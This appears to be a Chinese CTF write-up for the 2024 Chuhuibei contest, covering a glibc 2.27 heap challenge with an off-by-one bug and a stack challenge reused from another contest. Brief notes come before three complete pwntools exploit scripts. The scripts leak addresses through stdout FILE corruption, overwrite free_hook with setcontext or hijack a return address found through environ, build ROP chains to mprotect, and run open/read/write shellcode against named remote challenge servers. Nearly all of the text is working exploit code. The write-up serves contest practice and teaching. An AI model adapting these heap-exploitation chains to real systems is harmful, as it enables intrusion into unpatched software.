2024楚慧杯

EZheap_2

2.27堆题
add,free,edit三个功能

off-by-one漏洞,有沙盒

函数一个gift给出pie地址

我们可以攻击stdout_attack泄露libc

后续攻击free_hook为setcontext+53,构造出read读入shellcode

或者泄露environ劫持rbp+8

shellcode

from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
from ae64 import AE64
def bug():
    """Attach gdb to the live tube ``p`` and block until the debugger session is resumed.

    Intended for the local ``process()`` target; ``pause()`` keeps the script from
    racing ahead while breakpoints are being set.
    """
    gdb.attach(p)
    pause()
def s(a):
    """Send ``a`` to the tube ``p`` as-is (no trailing newline)."""
    p.send(a)
def sa(a,b):
    """Wait until ``a`` is received on ``p``, then send ``b`` without a newline."""
    p.sendafter(a,b)
def sl(a):
    """Send ``a`` to ``p`` followed by a newline."""
    p.sendline(a)
def sla(a,b):
    """Wait until ``a`` is received on ``p``, then send ``b`` followed by a newline."""
    p.sendlineafter(a,b)
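def r(a):
    """Receive up to ``a`` bytes from ``p`` and return them.

    Returning the data (instead of discarding it) makes this helper usable the
    same way as ``rl``; callers that ignore the result are unaffected.
    """
    return p.recv(a)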
#def pr(a):
#print(p.recv(a))
def rl(a):
    """Receive from ``p`` up to and including the delimiter ``a``; return everything read."""
    return p.recvuntil(a)
def inter():
    """Hand the tube ``p`` over to the user for interactive I/O."""
    p.interactive()
def get_addr64():
    """Read from ``p`` up to the first 0x7f byte and unpack the six bytes ending there as a 64-bit value.

    The six bytes are zero-padded to eight before ``u64`` (endianness follows the
    pwntools ``context``). Blocks until a 0x7f byte arrives, so it should only be
    called when the stream is known to contain one.
    """
    return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
    """Read from ``p`` up to the first 0xf7 byte and unpack the four bytes ending there with ``u32``."""
    return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
    """Return ``(system, "/bin/sh")`` addresses rebased by the module-level ``libc_base``.

    The second element is the first match of the NUL-terminated string in ``libc``.
    Requires ``libc_base`` to have been set already.
    """
    return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
    """Return ``(__malloc_hook, __free_hook)`` addresses rebased by the module-level ``libc_base``."""
    return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
def li(x):
    """Print ``x`` wrapped in a bold ANSI 256-colour escape (foreground index 214)."""
    print("\x1b[01;38;5;214m" + x + "\x1b[0m")


def ll(x):
    """Print ``x`` wrapped in a bold ANSI 256-colour escape (foreground index 1)."""
    print("\x1b[01;38;5;1m" + x + "\x1b[0m")


# amd64 target; 'debug' log level echoes every byte sent/received on the tube.
#context(os='linux',arch='i386',log_level='debug')
context(os='linux',arch='amd64',log_level='debug')
# libc shipped alongside the challenge; the alternatives below are kept for other setups.
libc=ELF('./libc.so.6')
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so')
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
# Local-process tube for debugging; the remote line is left commented out.
#p=remote('139.155.126.78',16215)
p = process('./pwn')

def add(i,size):
    """Menu option 1: request an allocation for slot ``i`` of ``size`` bytes, answering each prompt in turn."""
    rl("Your choice:")
    sl(str(1))
    rl("index:")
    sl(str(i))
    rl("Size:")
    sl(str(size))
def edit(i,content):
    """Menu option 2: write ``content`` into slot ``i``.

    ``content`` is sent raw via ``s`` (no newline appended), so the caller controls
    the exact byte count.
    """
    rl("Your choice:")
    sl(str(2))
    rl("index:")
    sl(str(i))
    rl("context: ")
    s(content)
def free(i):
    """Menu option 3: release slot ``i``."""
    rl("Your choice:")
    sl(str(3))
    rl("index:")
    sl(str(i))
def gift():
    """Menu option 4 with sub-choice 2; the response is parsed by the caller."""
    rl("Your choice:")
    sl(str(4))
    rl("choose:")
    sl(str(2))

add(0,0x18) #0
add(1,0x68) #1
add(2,0x68) #2
add(3,0x18) #3
edit(0,b'\x00'*0x18+p8(0xe1))
free(1)
add(4,0xd8)
gift()
rl(b'0x')
pie_base=int(p.recv(12),16)-0x202160
li(hex(pie_base))
free(2)
edit(4,b'\x00'*0x68+p64(0x71)+p64(pie_base+0x202020))
add(5,0x68)
add(6,0x68)
add(7,0x68)
edit(7,p64(0xfbad1800) + p64(0)*3 + b'\x00')
libc_base=get_addr64()-0x3ed8b0
li(hex(libc_base))
system,bin_sh=get_sb()
malloc_hook,free_hook=get_hook()
rdi = libc_base+libc.search(asm("pop rdi\nret")).__next__()
rsi = libc_base+libc.search(asm("pop rsi\nret")).__next__()
rdx = libc_base+libc.search(asm("pop rdx\nret")).__next__()
rax = libc_base+libc.search(asm("pop rax\nret")).__next__()
ret = libc_base+libc.search(asm("ret")).__next__()
syscall=libc_base+libc.search(asm("syscall\nret")).__next__()
jmp_rsp=libc_base+libc.search(asm("jmp rsp")).__next__()
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
open_addr=libc_base+libc.sym['open']
read_addr=libc_base + libc.sym['read']
write_addr=libc_base + libc.sym['write']


add(8,0x18)
add(9,0x58)
add(10,0x58)
add(11,0x18)

edit(8,b'\x00'*0x18+p8(0xc1))

free(9)
add(12,0xb8)
free(10)
edit(12,b'\x00'*0x58+p64(0x61)+p64(free_hook))
payload=(b'\x00'*0x68+p64(0)+p64(free_hook&0xfffffffffffff000)+p64(0)*2+p64(0x2000)).ljust(0xa0,b'\x00')+p64(free_hook&0xfffffffffffff000)+p64(syscall)
add(13,0x58)
add(14,0x58)
edit(14,p64(setcontext+53))
add(15,0x400)
edit(15,payload)
#bug()
free(15)
pause()
sleep(0.1)
payload = p64(rdi)+p64(free_hook&0xfffffffffffff000)
payload += p64(rsi)+p64(0x1000)
payload += p64(rdx)+p64(7)
payload += p64(rax)+p64(10)
payload += p64(syscall) #mprotect(free_hook&0xfffffffffffff000,0x1000,7)
payload += p64(jmp_rsp)
payload += asm(shellcraft.open('/flag'))
payload += asm(shellcraft.read(3,free_hook+0x300,0x30))
payload += asm(shellcraft.write(1,free_hook+0x300,0x30))

sl(payload)

inter()

environ

from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
from ae64 import AE64
def bug():
    """Attach gdb to the live tube ``p`` and block until the debugger session is resumed.

    Intended for the local ``process()`` target; ``pause()`` keeps the script from
    racing ahead while breakpoints are being set.
    """
    gdb.attach(p)
    pause()
def s(a):
    """Send ``a`` to the tube ``p`` as-is (no trailing newline)."""
    p.send(a)
def sa(a,b):
    """Wait until ``a`` is received on ``p``, then send ``b`` without a newline."""
    p.sendafter(a,b)
def sl(a):
    """Send ``a`` to ``p`` followed by a newline."""
    p.sendline(a)
def sla(a,b):
    """Wait until ``a`` is received on ``p``, then send ``b`` followed by a newline."""
    p.sendlineafter(a,b)
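def r(a):
    """Receive up to ``a`` bytes from ``p`` and return them.

    Returning the data (instead of discarding it) makes this helper usable the
    same way as ``rl``; callers that ignore the result are unaffected.
    """
    return p.recv(a)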
#def pr(a):
#print(p.recv(a))
def rl(a):
    """Receive from ``p`` up to and including the delimiter ``a``; return everything read."""
    return p.recvuntil(a)
def inter():
    """Hand the tube ``p`` over to the user for interactive I/O."""
    p.interactive()
def get_addr64():
    """Read from ``p`` up to the first 0x7f byte and unpack the six bytes ending there as a 64-bit value.

    The six bytes are zero-padded to eight before ``u64`` (endianness follows the
    pwntools ``context``). Blocks until a 0x7f byte arrives, so it should only be
    called when the stream is known to contain one.
    """
    return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
    """Read from ``p`` up to the first 0xf7 byte and unpack the four bytes ending there with ``u32``."""
    return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
    """Return ``(system, "/bin/sh")`` addresses rebased by the module-level ``libc_base``.

    The second element is the first match of the NUL-terminated string in ``libc``.
    Requires ``libc_base`` to have been set already.
    """
    return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
    """Return ``(__malloc_hook, __free_hook)`` addresses rebased by the module-level ``libc_base``."""
    return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
def li(x):
    """Print ``x`` wrapped in a bold ANSI 256-colour escape (foreground index 214)."""
    print("\x1b[01;38;5;214m" + x + "\x1b[0m")


def ll(x):
    """Print ``x`` wrapped in a bold ANSI 256-colour escape (foreground index 1)."""
    print("\x1b[01;38;5;1m" + x + "\x1b[0m")


# amd64 target; 'debug' log level echoes every byte sent/received on the tube.
#context(os='linux',arch='i386',log_level='debug')
context(os='linux',arch='amd64',log_level='debug')
# libc shipped alongside the challenge; the alternatives below are kept for other setups.
libc=ELF('./libc.so.6')
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so')
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
# Remote tube is active here; the local-process line is left commented out for debugging.
p=remote('139.155.126.78',16215)
#p = process('./pwn')

def add(i,size):
    """Menu option 1: request an allocation for slot ``i`` of ``size`` bytes, answering each prompt in turn."""
    rl("Your choice:")
    sl(str(1))
    rl("index:")
    sl(str(i))
    rl("Size:")
    sl(str(size))
def edit(i,content):
    """Menu option 2: write ``content`` into slot ``i``.

    ``content`` is sent raw via ``s`` (no newline appended), so the caller controls
    the exact byte count.
    """
    rl("Your choice:")
    sl(str(2))
    rl("index:")
    sl(str(i))
    rl("context: ")
    s(content)
def free(i):
    """Menu option 3: release slot ``i``."""
    rl("Your choice:")
    sl(str(3))
    rl("index:")
    sl(str(i))
def gift():
    """Menu option 4 with sub-choice 2; the response is parsed by the caller."""
    rl("Your choice:")
    sl(str(4))
    rl("choose:")
    sl(str(2))

add(0,0x18) #0
add(1,0x68) #1
add(2,0x68) #2
add(3,0x18) #3
edit(0,b'\x00'*0x18+p8(0xe1))
free(1)
add(4,0xd8)
gift()
rl(b'0x')
pie_base=int(p.recv(12),16)-0x202160
li(hex(pie_base))
free(2)
edit(4,b'\x00'*0x68+p64(0x71)+p64(pie_base+0x202020))
add(5,0x68)
add(6,0x68)
add(7,0x68)
edit(7,p64(0xfbad1800) + p64(0)*3 + b'\x00')
libc_base=get_addr64()-0x3ed8b0
li(hex(libc_base))
system,bin_sh=get_sb()
environ=libc_base+libc.sym['environ']
rdi = libc_base+libc.search(asm("pop rdi\nret")).__next__()
rsi = libc_base+libc.search(asm("pop rsi\nret")).__next__()
rdx = libc_base+libc.search(asm("pop rdx\nret")).__next__()
rax = libc_base+libc.search(asm("pop rax\nret")).__next__()
ret = libc_base+libc.search(asm("ret")).__next__()
syscall=libc_base+libc.search(asm("syscall\nret")).__next__()
jmp_rsp=libc_base+libc.search(asm("jmp rsp")).__next__()
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']+53
open_addr=libc_base+libc.sym['open']
read_addr=libc_base + libc.sym['read']
write_addr=libc_base + libc.sym['write']
shell=p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)
stdout_attack=p64(0xfbad1800)+p64(0)*3+p64(environ)+p64(environ+8)
edit(7,stdout_attack)
stack=get_addr64()-280
li(hex(stack))

add(8,0x18)
add(9,0x58)
add(10,0x58)
add(11,0x18)

edit(8,b'\x00'*0x18+p8(0xc1))

free(9)
add(12,0xb8)
free(10)
edit(12,b'\x00'*0x58+p64(0x61)+p64(stack-0x10))
shell=p64(rdi)+p64(0)+p64(rsi)+p64(stack+64)+p64(rax)+p64(0)+p64(syscall)
add(13,0x58)
add(14,0x58)
flag=stack
reads=b'/flag\x00\x00\x00'*3+shell
#bug()
edit(14,reads)

#pause()
sleep(0.1)
orw = p64(rdi) + p64(flag) #/flag的字符串位置,要改
orw += p64(rsi) + p64(0)
orw += p64(open_addr)
orw += p64(rdi) + p64(3)
orw += p64(rdx) + p64(0x50)
orw += p64(rsi)+p64(flag+0x500) #读入flag的位置
orw += p64(read_addr)
orw += p64(rdi) + p64(1)
orw += p64(rdx) + p64(0x50)
orw += p64(rsi)+p64(flag+0x500) #读入flag的位置
orw += p64(write_addr)

sl(orw)

inter()

pwn1

源鲁杯原题

[Round 1] canary_orw

jmp rsp,直接给我们0x15字节的溢出,控制函数返回到vuln,并且执行jmp rsp,并写入shellcode,返回栈顶,构造read,读入orw,获取flag,中间有个任意地址写,写的时候忘了利用了,要不然出的更快

from pwn import*
from struct import pack
import ctypes
from LibcSearcher import *
from ae64 import AE64
def bug():
    """Attach gdb to the live tube ``p`` and block until the debugger session is resumed.

    Intended for the local ``process()`` target; ``pause()`` keeps the script from
    racing ahead while breakpoints are being set.
    """
    gdb.attach(p)
    pause()
def s(a):
    """Send ``a`` to the tube ``p`` as-is (no trailing newline)."""
    p.send(a)
def sa(a,b):
    """Wait until ``a`` is received on ``p``, then send ``b`` without a newline."""
    p.sendafter(a,b)
def sl(a):
    """Send ``a`` to ``p`` followed by a newline."""
    p.sendline(a)
def sla(a,b):
    """Wait until ``a`` is received on ``p``, then send ``b`` followed by a newline."""
    p.sendlineafter(a,b)
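def r(a):
    """Receive up to ``a`` bytes from ``p`` and return them.

    Returning the data (instead of discarding it) makes this helper usable the
    same way as ``rl``; callers that ignore the result are unaffected.
    """
    return p.recv(a)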
#def pr(a):
#print(p.recv(a))
def rl(a):
    """Receive from ``p`` up to and including the delimiter ``a``; return everything read."""
    return p.recvuntil(a)
def inter():
    """Hand the tube ``p`` over to the user for interactive I/O."""
    p.interactive()
def get_addr64():
    """Read from ``p`` up to the first 0x7f byte and unpack the six bytes ending there as a 64-bit value.

    The six bytes are zero-padded to eight before ``u64`` (endianness follows the
    pwntools ``context``). Blocks until a 0x7f byte arrives, so it should only be
    called when the stream is known to contain one.
    """
    return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
    """Read from ``p`` up to the first 0xf7 byte and unpack the four bytes ending there with ``u32``."""
    return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
    """Return ``(system, "/bin/sh")`` addresses rebased by the module-level ``libc_base``.

    The second element is the first match of the NUL-terminated string in ``libc``.
    Requires ``libc_base`` to have been set already.
    """
    return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
    """Return ``(__malloc_hook, __free_hook)`` addresses rebased by the module-level ``libc_base``."""
    return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
def pr(x):
    """Print ``x`` wrapped in a bold ANSI 256-colour escape (foreground index 214)."""
    print("\x1b[01;38;5;214m" + x + "\x1b[0m")


def ll(x):
    """Print ``x`` wrapped in a bold ANSI 256-colour escape (foreground index 1)."""
    print("\x1b[01;38;5;1m" + x + "\x1b[0m")


# amd64 target; 'debug' log level echoes every byte sent/received on the tube.
#context(os='linux',arch='i386',log_level='debug')
context(os='linux',arch='amd64',log_level='debug')
# System libc is used here; the alternatives below are kept for other setups.
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so')
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
# Remote tube is active here; the local-process line is left commented out for debugging.
p=remote('challenge.yuanloo.com',29329)
#p = process('./pwn')

vuln=0x400820
jmp_rsp=0x40081B
rl("Say some old spells to start the journey\n")

payload =p64(vuln)+p64(jmp_rsp)
payload+=asm('''
xchg rsi,rsp
jmp rsp
''')
pr(hex(len(payload)))
#bug()
s(payload)

rl("Tell me the location of the Eye of the Deep Sea\n")
s(b'a'*8)
rl("I have magic\n")
payload=asm('''
sub rsp,0x30
jmp rsp
''')
s(payload)
rl("Let's go!\n")
payload=asm('''
sub rsi,0x2a
syscall
''')
#bug()
s(payload)


sleep(0.1)
pay=asm('''
mov rax, 0x67616c662f2e
push rax
xor rdi, rdi
sub rdi, 100
mov rsi, rsp
xor edx, edx
xor r10, r10
push SYS_openat
pop rax
syscall



mov rdi, 1
mov rsi, 3
push 0
mov rdx, rsp
mov r10, 0x100
push SYS_sendfile
pop rax
syscall
''')
s(pay)


inter()